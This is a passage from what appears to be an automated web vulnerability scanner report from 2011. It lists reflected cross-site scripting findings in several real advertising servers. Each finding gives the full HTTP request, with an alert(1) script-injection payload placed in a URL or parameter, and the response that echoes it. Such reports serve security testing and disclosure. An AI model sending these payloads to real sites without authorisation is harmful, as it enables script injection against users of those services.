Date: Sat, 17 Sep 2011 16:23:45 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='1229bf517f8af24';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30217030312_1316276625","http://ad.doubleclick.net/adj/q1.q.seattlepostintelligencer400ca'-alert(1)-'bb299063a32/qo;net=q1;u=,q1-30217030312_1316276625,1229bf517f8af24,polit,;;cmw=owl;sz=300x250;net=q1;ord1=841037;contx=polit;dc=s;btg=;ord=[timestamp]?","300","250",true);</scr'+'ipt>
...[SNIP]...

4.31. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/qo [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.q.seattlepostintelligencer/qo

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6da30'-alert(1)-'f578bbc5ef0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/q1.q.seattlepostintelligencer/qo6da30'-alert(1)-'f578bbc5ef0;sz=300x250;net=q1;ord=[timestamp];ord1=841037;cmpgurl=http%253A//www.seattlepi.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7363
Date: Sat, 17 Sep 2011 16:23:45 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='1229bf517f8af24';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30405826374_1316276625","http://ad.doubleclick.net/adj/q1.q.seattlepostintelligencer/qo6da30'-alert(1)-'f578bbc5ef0;net=q1;u=,q1-30405826374_1316276625,1229bf517f8af24,polit,;;cmw=owl;sz=300x250;net=q1;ord1=841037;contx=polit;dc=s;btg=;ord=[timestamp]?","300","250",true);</scr'+'ipt>
...[SNIP]...

4.32. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/qo [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.q.seattlepostintelligencer/qo

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91f0f'-alert(1)-'443691ddcbd was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/q1.q.seattlepostintelligencer/qo;sz=91f0f'-alert(1)-'443691ddcbd HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7342
Date: Sat, 17 Sep 2011 16:23:40 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='1229bf517f8af24';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
pt">CollectiveMedia.createAndAttachAd("q1-30108446215_1316276620","http://ad.doubleclick.net/adj/q1.q.seattlepostintelligencer/qo;net=q1;u=,q1-30108446215_1316276620,1229bf517f8af24,none,;;cmw=nurl;sz=91f0f'-alert(1)-'443691ddcbd;contx=none;dc=s;btg=?","91f0f'-alert(1)-'443691ddcbd","",true);</scr'+'ipt>
...[SNIP]...

4.33. http://ad.agkn.com/iframe!t=1089! [clk1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.agkn.com
Path:	/iframe!t=1089!

Issue detail

The value of the clk1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2898"%3balert(1)//fa66136d678 was submitted in the clk1 parameter. This input was echoed as e2898";alert(1)//fa66136d678 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /iframe!t=1089!?ct=US&st=TX&ac=214&zp=75207&bw=4&dma=102&city=13290&che=3807892&clk1=http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/u%3B245108818%3B0-0%3B0%3B69151653%3B3454-728/90%3B43624044/43641831/1%3B%3B%7Eokv%3D%3Bpc%3DDFP244754359%3B%3B%7Eaopt%3D0/ff/34/ff%3B%7Efdr%3D244754359%3B0-0%3B0%3B18485482%3B3454-728/90%3B43698008/43715795/1%3B%3B%7Eokv%3D%3Bsite%3Danswerology%3Bcat%3Dother%3Bdemo%3Dadult%3Btile%3D1%3Bsect%3Danswerology%3Bdcopt%3Dist%3Bsz%3D728x90%3Brsi%3D%3B%7Eaopt%3D2/0/34/0%3B%7Esscs%3D%3fe2898"%3balert(1)//fa66136d678 HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/index.aspx?template=ads.ascx&topic=other&tile=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=184471637933354914; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Thu, 15-Sep-2016 16:43:48 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIWB4rEAAAAAGwBArgBASUYDSgBUAANKQFgAA0qASAADSsBUAANLAFQAA0tATAADS4BUAANLwFwAA0lAUAADSYBQAANJwFAAA05AWAADTgBcAANOwGAAA06AUAADTwBMAANMQEwAA0wARAADTMBYAANMgFAAA01ARAADTQBQAANNwFwAA02AVAABQEgAQCAASEBAIABJgEAgAEfAQCAAR4BAIABArh%2BNmC3IYoKl9sAAAAAAAADCQAAAAAAAA03AAAAAAAAASUCSgAA; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Mon, 16-Sep-2013 16:43:48 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:43:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
4359;;~aopt=0/ff/34/ff;~fdr=244754359;0-0;0;18485482;3454-728/90;43698008/43715795/1;;~okv=;site=answerology;cat=other;demo=adult;tile=1;sect=answerology;dcopt=ist;sz=728x90;rsi=;~aopt=2/0/34/0;~sscs=?e2898";alert(1)//fa66136d678http://ad.agkn.com/interaction!che=253133449?imid=3918333030490085339&ipid=777&caid=696&cgid=293&crid=3383&a=CLICK&adid=586&status=0&l=http://www.pantene.com/en-US/hair-care-collections/restore-beautif
...[SNIP]...

4.34. http://ad.agkn.com/iframe!t=1089! [clk1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.agkn.com
Path:	/iframe!t=1089!

Issue detail

The value of the clk1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99ad9"><script>alert(1)</script>435adb126ae was submitted in the clk1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1089!?ct=US&st=TX&ac=214&zp=75207&bw=4&dma=102&city=13290&che=3807892&clk1=http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/u%3B245108818%3B0-0%3B0%3B69151653%3B3454-728/90%3B43624044/43641831/1%3B%3B%7Eokv%3D%3Bpc%3DDFP244754359%3B%3B%7Eaopt%3D0/ff/34/ff%3B%7Efdr%3D244754359%3B0-0%3B0%3B18485482%3B3454-728/90%3B43698008/43715795/1%3B%3B%7Eokv%3D%3Bsite%3Danswerology%3Bcat%3Dother%3Bdemo%3Dadult%3Btile%3D1%3Bsect%3Danswerology%3Bdcopt%3Dist%3Bsz%3D728x90%3Brsi%3D%3B%7Eaopt%3D2/0/34/0%3B%7Esscs%3D%3f99ad9"><script>alert(1)</script>435adb126ae HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/index.aspx?template=ads.ascx&topic=other&tile=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=184471637933354914; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Thu, 15-Sep-2016 16:43:47 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIWB4rDAAAAAGoBArgBASUYDSgBUAANKQFgAA0qASAADSsBUAANLAFAAA0tATAADS4BUAANLwFwAA0lAUAADSYBQAANJwFAAA05AWAADTgBcAANOwGAAA06AUAADTwBMAANMQEwAA0wARAADTMBYAANMgFAAA01ARAADTQBQAANNwFgAA02AVAABQEgAQCAASEBAIABJgEAgAEfAQCAAR4BAIABArh%2BIc9vMfB8Iq8AAAAAAAADCQAAAAAAAA08AAAAAAAAASUCSgAA; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Mon, 16-Sep-2013 16:43:47 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:43:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
4359;;~aopt=0/ff/34/ff;~fdr=244754359;0-0;0;18485482;3454-728/90;43698008/43715795/1;;~okv=;site=answerology;cat=other;demo=adult;tile=1;sect=answerology;dcopt=ist;sz=728x90;rsi=;~aopt=2/0/34/0;~sscs=?99ad9"><script>alert(1)</script>435adb126aehttp://ad.agkn.com/interaction!che=472696441?imid=2436288183709475503&ipid=777&caid=696&cgid=293&crid=3388&a=CLICK&adid=586&status=0&l=http://www.pantene.com/en-US/hair-care-collections/restore-beautif
...[SNIP]...

4.35. http://ad.agkn.com/iframe!t=1089! [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.agkn.com
Path:	/iframe!t=1089!

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66d9b"><script>alert(1)</script>33d30fc9f77 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1089!?ct=US&st=TX&ac=214&zp=75207&bw=4&dma=102&city=13290&che=3807892&clk1=http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/u%3B245108818%3B0-0%3B0%3B69151653%3B3454-728/90%3B43624044/43641831/1%3B%3B%7Eokv%3D%3Bpc%3DDFP244754359%3B%3B%7Eaopt%3D0/ff/34/ff%3B%7Efdr%3D244754359%3B0-0%3B0%3B18485482%3B3454-728/90%3B43698008/43715795/1%3B%3B%7Eokv%3D%3Bsite%3Danswerology%3Bcat%3Dother%3Bdemo%3Dadult%3Btile%3D1%3Bsect%3Danswerology%3Bdcopt%3Dist%3Bsz%3D728x90%3Brsi%3D%3B%7Eaopt%3D2/0/34/0%3B%7Esscs%3D%3f&66d9b"><script>alert(1)</script>33d30fc9f77=1 HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/index.aspx?template=ads.ascx&topic=other&tile=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Thu, 15-Sep-2016 16:43:53 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=""; Version=1; Domain=.agkn.com; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:43:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
359;;~aopt=0/ff/34/ff;~fdr=244754359;0-0;0;18485482;3454-728/90;43698008/43715795/1;;~okv=;site=answerology;cat=other;demo=adult;tile=1;sect=answerology;dcopt=ist;sz=728x90;rsi=;~aopt=2/0/34/0;~sscs=?&66d9b"><script>alert(1)</script>33d30fc9f77=1http://ad.agkn.com/interaction!che=1729807310?imid=1986120337867889664&ipid=777&caid=696&cgid=293&crid=3365&a=CLICK&adid=586&status=0&l=http://www.pantene.com/en-US/hair-care-collections/restore-beau
...[SNIP]...

4.36. http://ad.agkn.com/iframe!t=1089! [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.agkn.com
Path:	/iframe!t=1089!

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0d02"%3balert(1)//af3500c71af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d0d02";alert(1)//af3500c71af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /iframe!t=1089!?ct=US&st=TX&ac=214&zp=75207&bw=4&dma=102&city=13290&che=3807892&clk1=http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/u%3B245108818%3B0-0%3B0%3B69151653%3B3454-728/90%3B43624044/43641831/1%3B%3B%7Eokv%3D%3Bpc%3DDFP244754359%3B%3B%7Eaopt%3D0/ff/34/ff%3B%7Efdr%3D244754359%3B0-0%3B0%3B18485482%3B3454-728/90%3B43698008/43715795/1%3B%3B%7Eokv%3D%3Bsite%3Danswerology%3Bcat%3Dother%3Bdemo%3Dadult%3Btile%3D1%3Bsect%3Danswerology%3Bdcopt%3Dist%3Bsz%3D728x90%3Brsi%3D%3B%7Eaopt%3D2/0/34/0%3B%7Esscs%3D%3f&d0d02"%3balert(1)//af3500c71af=1 HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/index.aspx?template=ads.ascx&topic=other&tile=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Thu, 15-Sep-2016 16:43:53 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=""; Version=1; Domain=.agkn.com; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:43:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
359;;~aopt=0/ff/34/ff;~fdr=244754359;0-0;0;18485482;3454-728/90;43698008/43715795/1;;~okv=;site=answerology;cat=other;demo=adult;tile=1;sect=answerology;dcopt=ist;sz=728x90;rsi=;~aopt=2/0/34/0;~sscs=?&d0d02";alert(1)//af3500c71af=1http://ad.agkn.com/interaction!che=874001907?imid=2782821342895287091&ipid=777&caid=696&cgid=293&crid=3365&a=CLICK&adid=586&status=0&l=http://www.pantene.com/en-US/hair-care-collections/restore-beaut
...[SNIP]...

4.37. http://adnxs.revsci.net/imp [Z parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adnxs.revsci.net
Path:	/imp

Issue detail

The value of the Z request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8f31'-alert(1)-'3e4fe9ccd73 was submitted in the Z parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /imp?Z=728x90d8f31'-alert(1)-'3e4fe9ccd73&s=937499&r=1&_salt=1172267925&u=http%3A%2F%2Fwww.seattlepi.com%2F HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Sun, 18-Sep-2011 16:24:27 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 16:24:27 GMT
Content-Length: 468

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=728x90d8f31'-alert(1)-'3e4fe9ccd73&referrer=http://www.seattlepi.com/&inv_code=937499&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D728x90d8f31%27-alert%281%29-%273e4fe9ccd73%26s%3D93
...[SNIP]...

4.38. http://adnxs.revsci.net/imp [s parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adnxs.revsci.net
Path:	/imp

Issue detail

The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3216d'-alert(1)-'e768692f2be was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /imp?Z=728x90&s=9374993216d'-alert(1)-'e768692f2be&r=1&_salt=1172267925&u=http%3A%2F%2Fwww.seattlepi.com%2F HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Sun, 18-Sep-2011 16:24:44 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 16:24:44 GMT
Content-Length: 468

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=728x90&referrer=http://www.seattlepi.com/&inv_code=9374993216d'-alert(1)-'e768692f2be&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D728x90%26s%3D9374993216d%27-alert%281%29-%27e768692f2be%26r%3D1%26_salt%3D1172267925%26u%3Dhttp%253A%2
...[SNIP]...

4.39. http://ads.adbrite.com/adserver/vdi/762701 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/762701

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ee6a5<script>alert(1)</script>5c123fbe1b5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/762701ee6a5<script>alert(1)</script>5c123fbe1b5?d=439524AE8C6B634E021F5F7802166020 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.gather.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; untarget=1; b="%3A%3A13beg"; geo="1%3AJY5LDoIwEEDv0q2ftPQ77IwXMEEPgOUTEwEDVQOEuzszbl5eX9tpV%2FFRIl%2FF8niJXIBVUu2ImumY4YBUXJQl19w1dw3khm%2BZQLSSuuPiDNFLZkbd8xzgM8C74MRepAWfvxRX1Gro0KehSc9yrsdjxDXWrsQapEfvv2mm76LG4Y1yK6jW6d%2FGtkc5n1CnR4sqwcfgG7hLaKLX1sVQZSBdU1daW6PFtv0A"; vsd=0@9@4e73f2c9@widget.newsinc.com

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Sat, 17 Sep 2011 16:35:32 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/762701ee6a5<script>alert(1)</script>5c123fbe1b5

4.40. http://adsfac.us/ag.asp [cc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adsfac.us
Path:	/ag.asp

Issue detail

The value of the cc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 504f7"><script>alert(1)</script>97b487c8f84 was submitted in the cc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ag.asp?cc=504f7"><script>alert(1)</script>97b487c8f84&source=iframe&ord=2088513037&clk=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUlTQiwUs97GUoORfCML_fSCJZ25FnZW8sdXNhLHQsMTMxNjI3NjcxOTY5MCxjLDM3ODM3NCxwYyw5MDEyMCxhYywxOTY0NjIsbyxOMC1TMCxsLDcyOTAzCg--/clkurl= HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/misquincemag_us?t=1316294776909&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.misquincemag.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESE002=fpt=0%2C310408%2C311033%2C311032%2C&pct%5Fdate=4262&pctm=3&FM32614=1&FL310408=1&FL311033=1&pctl=311032&FL311032=1&FM32670=1&FM38928=1&pctc=32670&FQ=3; FSQTS044=pctl=304960&pctm=1&fpt=0%2C304960%2C&pct%5Fdate=4267&FM39385=1&pctc=39385&FL304960=1&FQ=1; UserID=983108392662652

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 365
Content-Type: text/html
Expires: Sat, 17 Sep 2011 16:37:26 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: FS504f7%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E97b487c8f840=uid=17420266; expires=Sun, 18-Sep-2011 16:38:26 GMT; domain=.adsfac.us; path=/
Set-Cookie: FS504f7%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E97b487c8f84=pctl=0&fpt=0%2C0%2C&pct%5Fdate=4277&pctm=1&FM1=1&pctc=1&FL0=1&FQ=1; expires=Mon, 17-Oct-2011 16:38:26 GMT; domain=.adsfac.us; path=/
Set-Cookie: UserID=98310839266265250e8c376c5f1b330f262bd69; expires=Mon, 17-Oct-2011 16:38:26 GMT; domain=.adsfac.us; path=/
P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT"
Date: Sat, 17 Sep 2011 16:38:26 GMT
Connection: close

<a href="http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUlTQiwUs97GUoORfCML_fSCJZ25FnZW8sdXNhLHQsMTMxNjI3NjcxOTY5MCxjLDM3ODM3NCxwYyw5MDEyMCxhYywxOTY0NjIsbyxOMC1TMCxsLDcyOTAzCg--/clkurl=http://adsfac.us/link.asp?cc=504f7"><script>alert(1)</script>97b487c8f84.0.0&CreativeID=1" target=_blank>
...[SNIP]...

4.41. http://adsfac.us/ag.asp [clk parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adsfac.us
Path:	/ag.asp

Issue detail

The value of the clk request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33c3d'%3balert(1)//f39440116ba was submitted in the clk parameter. This input was echoed as 33c3d';alert(1)//f39440116ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

